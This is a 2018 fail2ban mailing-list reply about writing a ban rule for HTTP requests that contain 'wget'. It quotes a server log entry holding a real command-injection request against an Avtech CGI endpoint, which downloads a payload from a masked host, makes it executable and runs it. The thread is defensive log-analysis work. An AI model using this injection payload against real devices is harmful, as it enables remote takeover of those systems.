'Re: [Fail2ban-users] Ban IPs that try to "wget" in the request'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       fail2ban-users
Subject:    Re: [Fail2ban-users] Ban IPs that try to "wget" in the request
From:       James Moe via Fail2ban-users <fail2ban-users () lists ! sourceforge ! net>
Date:       2018-11-24 21:08:11
Message-ID: 5771c86c-d841-a140-8c48-da5aaa90e841 () sohnen-moe ! com
[Download RAW message or body]

On 24/11/2018 6.58 AM, Kevin S/Lucas Y wrote:

> I try to ban IPs that try to wget something into my server.
> how am i going to do the failregex?
> For example:
> Nov 20 18:04:28 ubuntu haproxy[12789]: ***********:39636
> [20/Nov/2018:18:04:28.627] http_front http_back/main 286/0/4/25/315 400
> 392 - - ---- 0/0/0/0/0 0/0 "GET
> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com
> <http://google.com>&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.U \
> ser1.Password%3E$(cd%20/tmp;%20wget%20http://***********/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin
>  HTTP/1.1"
> 
  Without a source IP address for the <HOST>, there is no regex to match
the given text.

-- 
James Moe
moe dot james at sohnen-moe dot com
520.743.3936
Think.


_______________________________________________
Fail2ban-users mailing list
Fail2ban-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/fail2ban-users


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic